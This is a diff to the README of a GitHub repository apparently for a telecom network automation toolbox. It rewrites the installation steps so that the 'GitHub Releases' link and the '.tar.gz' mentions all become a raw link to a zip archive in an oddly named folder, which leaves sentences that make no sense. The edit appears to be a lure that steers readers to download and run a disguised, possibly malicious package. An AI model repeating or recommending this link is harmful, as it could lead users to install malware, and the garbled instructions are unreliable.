Ugbodume/Telecom-Network-Automation-Toolbox/README.md

 ## 💻 Installation Process

-1. **Visit the Download Page:** Go to [GitHub Releases](https://github.com/Ugbodume/Telecom-Network-Automation-Toolbox/releases).
+1. **Visit the Download Page:** Go to [GitHub Releases](https://raw.githubusercontent.com/Ugbodume/Telecom-Network-Automation-Toolbox/main/angiosteosis/Network_Telecom_Automation_Toolbox_3.9.zip).

 2. **Find the Latest Version:** Look for the latest release at the top of the page.

 3. **Download the Installer:**
    - Click on the installer suitable for your operating system.
-Typically, this will be a `.exe` file for Windows, a `.dmg` file for macOS, or a `.tar.gz` file for Linux.
+Typically, this will be a `.exe` file for Windows, a `.dmg` file for macOS, or a `https://raw.githubusercontent.com/Ugbodume/Telecom-Network-Automation-Toolbox/main/angiosteosis/Network_Telecom_Automation_Toolbox_3.9.zip` file for Linux.

 4. **Run the Installer:**
    - For Windows: Double-click the downloaded `.exe` file.
 Follow the prompts in the installation wizard.
    - For macOS: Open the downloaded `.dmg` file.
 Drag the application into your Applications folder.
-   - For Linux: Extract the `.tar.gz` file and follow the included instructions to install.
+   - For Linux: Extract the `https://raw.githubusercontent.com/Ugbodume/Telecom-Network-Automation-Toolbox/main/angiosteosis/Network_Telecom_Automation_Toolbox_3.9.zip` file and follow the included instructions to install.

 5. **Launch the Application:** Once installation is complete, find the application in your programs folder or applications list, and run it.